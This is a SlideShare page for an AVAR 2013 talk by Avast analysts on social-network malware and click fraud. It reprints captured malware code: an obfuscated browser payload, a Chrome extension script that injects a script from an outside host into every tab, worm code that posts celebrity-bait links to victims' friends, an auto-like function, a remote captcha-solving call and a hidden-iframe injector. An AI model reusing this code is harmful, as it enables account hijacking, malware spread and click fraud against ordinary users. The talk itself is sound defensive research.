Every Click Counts (But All the Money Goes to Me)
0 likes185 views
Today, social sites make up a big, open vector for people who want monetize their ideas. But sometimes those ideas are not as legitimate as one would hope. One of the more unscrupulous ways to “earn” money is to steal your identity, email accounts, and/or credit card details. Another way is to misuse your computer as a money-making machine for cybercriminals. Presented at AVAR 2013 by Jan Sirmer and Lukas Hasik, Virus Analysts & Researchers at Avast Software.
![Payloads for FF and Chrome
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){
whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}
('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ;
2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25||
2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25||
2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")=="")
{2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65))
{2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71''80&68'24&76`74}5", 17,8)}},64:9(){36
10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="")
{2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101;
102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26)
{63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28
103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15)
{34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26)
{15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)|
0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15)
{39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-16-320.jpg)
![j.php content
function updated(tabId, changeInfo, tab){ if(changeInfo.status
== 'complete'){ chrome.tabs.executeScript(tabId,
{code:"if(window==window.top){var
h=document.getElementsByTagName('head')[0];var
s=document.createElement('script');s.type='text/javascript';s.sr
c='http://uhnm6.me/EDITED.php?
v=0.05a';h.appendChild(s);}"}, null); } }
chrome.tabs.onUpdated.addListener(updated);
chrome.tabs.getAllInWindow(null,function(tabs){ for(var i=0;i <
tabs.length;i++){ chrome.tabs.executeScript(tabs[i].id,
{code:"if(window==window.top){var
h=document.getElementsByTagName('head')[0];var
s=document.createElement('script');s.type='text/javascript';s.sr
c='http://uhnm76.me/EDITED.php?
v=0.05a';h.appendChild(s);}"}, null); } });](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-19-320.jpg)
![Spreading malware
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating
on hidden camera", "It happened in United Stateshotel",
"http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "",
"20", "friend", "327065014030715", "431402153539537",
"AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
if ((1 == 1)) {
var randomnumber = Math.floor(Math.random() * 100);
if (randomnumber > 0) {](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-22-320.jpg)
![Spreading malware
var uri = "http://tol.co/5q";
if ((document.location.href.search("tagged.com") > -1)) {
var ids = get_friends_t(1);
if (ids.length > 0) {
for (var i in ids) {
send_msg(uri, ids[i], "2222")
}
} else {
post_item("LOL Miley Cyrus got caught having s3x
" + uri, "2222")
}
}](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-23-320.jpg)
![Functionality
function likepage(pageid) {
var likepost = "fbpage_id=" + pageid +
"&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet
_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt +
"&lsd&post_form_id_source=AsyncRequest";
var likepage = new XMLHttpRequest();
likepage.open("POST", "/ajax/pages/fan_status.php?
__a=1");
likepage.send(likepost)
}](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-24-320.jpg)
![Functionality
function get_online_friends(limit) {
var friends = get_friends(limit);
var friends = make_array(friends);
friends.sort();
var postfields = "user=" + uid;
for (var i = 0; i < friends.length; i++) {
postfields += "&available_user_info_ids[" + i + "]=" +
friends[i]
}](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-25-320.jpg)
![Functionality
function get_solved_captcha(extra_challenge_params, opt)
{
var output = new Array(3);
var post = new XMLHttpRequest();
post.open("GET",
"http://mp56a.com/fn/cs/api/s_c.php?u=" +
escape(extra_challenge_params), false);
post.send();
if (post.readyState == 4 && post.status == 200) {
data = eval('(' + post.responseText + ')');
console.log(data);
post[1] = data.key;
post[2] = data.challenge
}](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-26-320.jpg)
![Create injected iframe
function createIframe(src) {
var ifr = document.createElement("iframe");
ifr.setAttribute("src", src);
ifr.style.position = "absolute";
ifr.style.top = "0";
ifr.style.left = "0";
ifr.style.width = "100%";
ifr.style.height = "100%";
document.body.appendChild(ifr)
}
function get_img_src(src, no) {
x = src.getElementsByTagName("img");
return x[no].id
}
function make_dom(src) {
var tempDiv = document.createElement("div");
tempDiv.innerHTML = src;
return tempDiv
}](https://image.slidesharecdn.com/avar2012-your-every-click-counts-hasik-sirmer-150521215236-lva1-app6892-170826015928/85/Every-Click-Counts-But-All-the-Money-Goes-to-Me-27-320.jpg)
More Related Content
What's hot (20)
Similar to Every Click Counts (But All the Money Goes to Me) (20)
More from Avast (7)
Recently uploaded (19)
Every Click Counts (But All the Money Goes to Me)
- 2. Every Click Counts (But All the Money Goes to Me) Lukáš Hasík Jan Širmer
- 3. Agenda • Simple way to steal credentials • Click for me • Executable clicker • Data from AVAST CommunityIQ userbase • Summary • Questions
- 4. Simple way to steal credentials
- 5. Simple way to steal credentials credentials
- 6. Simple way to steal credentials
- 7. Simple way to steal credentials User feels confident – s/he received a confirmation
- 8. Simple way to steal credentials And some users really provided they real credentials…
- 9. Click for me
- 11. Click for me
- 14. Payloads
- 15. Payload in IE
- 16. Payloads for FF and Chrome eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){ whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1}; while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p} ('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ; 2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25|| 2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25|| 2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")=="") {2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65)) {2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71''80&68'24&76`74}5", 17,8)}},64:9(){36 10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="") {2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101; 102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26) {63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28 103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15) {34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26) {15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)| 0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15) {39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));
- 17. Unpacked dean
- 18. Change setting in browser TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9 TestAddon.ch default string TestAddon.date user set string 1340624313 TestAddon.guid user set string 3c94f90903f031a799162872a55742e8 TestAddon.int user set string 60 TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5
- 19. j.php content function updated(tabId, changeInfo, tab){ if(changeInfo.status == 'complete'){ chrome.tabs.executeScript(tabId, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.sr c='http://uhnm6.me/EDITED.php? v=0.05a';h.appendChild(s);}"}, null); } } chrome.tabs.onUpdated.addListener(updated); chrome.tabs.getAllInWindow(null,function(tabs){ for(var i=0;i < tabs.length;i++){ chrome.tabs.executeScript(tabs[i].id, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.sr c='http://uhnm76.me/EDITED.php? v=0.05a';h.appendChild(s);}"}, null); } });
- 20. js_f.php • Two different ways 1. Spreading malware to other people and works as a clicker 2. Only clicker
- 21. Spreading malware • Script updates the victim’s Facebook and twitter status by posting new status messages
- 22. Spreading malware var videos = new Array(10); videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772"); var flk = Array(); if ((1 == 1)) { var randomnumber = Math.floor(Math.random() * 100); if (randomnumber > 0) {
- 23. Spreading malware var uri = "http://tol.co/5q"; if ((document.location.href.search("tagged.com") > -1)) { var ids = get_friends_t(1); if (ids.length > 0) { for (var i in ids) { send_msg(uri, ids[i], "2222") } } else { post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222") } }
- 24. Functionality function likepage(pageid) { var likepost = "fbpage_id=" + pageid + "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet _header&post_form_id=" + fid + "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest"; var likepage = new XMLHttpRequest(); likepage.open("POST", "/ajax/pages/fan_status.php? __a=1"); likepage.send(likepost) }
- 25. Functionality function get_online_friends(limit) { var friends = get_friends(limit); var friends = make_array(friends); friends.sort(); var postfields = "user=" + uid; for (var i = 0; i < friends.length; i++) { postfields += "&available_user_info_ids[" + i + "]=" + friends[i] }
- 26. Functionality function get_solved_captcha(extra_challenge_params, opt) { var output = new Array(3); var post = new XMLHttpRequest(); post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false); post.send(); if (post.readyState == 4 && post.status == 200) { data = eval('(' + post.responseText + ')'); console.log(data); post[1] = data.key; post[2] = data.challenge }
- 27. Create injected iframe function createIframe(src) { var ifr = document.createElement("iframe"); ifr.setAttribute("src", src); ifr.style.position = "absolute"; ifr.style.top = "0"; ifr.style.left = "0"; ifr.style.width = "100%"; ifr.style.height = "100%"; document.body.appendChild(ifr) } function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id } function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv }
- 28. Clicker • BHO, Firefox and Chrome payloads contain link to site like http://resultsz.com/search/anticheat6.php?username=foreste • There is hosted list of sites used by all of those “clickers” for injecting hidden iframe with every visited site and earning money to the blackhat.
- 29. Summary • Be aware of social engineering – Even simple attempts can be successful • Social networks are used for spreading malware – More user == more efficiency • Trendy topics, celebrities and latest news are often start point for these infection vectors
- 31. Thank you Jan Sirmer ([email protected]) Senior Virus Analyst Lukas Hasik ([email protected]) QA Director
Editor's Notes
- #3: predstaveni
- #11: 1)User click on Kirsten’s video 2)There is a malware 3)Malware secretly inject user’s PC 4)Malware communicate with C&C where receive a list of sites where to click 5)Malware clicks on received sites 6)Bad guy receive money
- #16: Inside jstest.js are many links to different sites that are visited by user’s browser and the attacker gains money from clicks.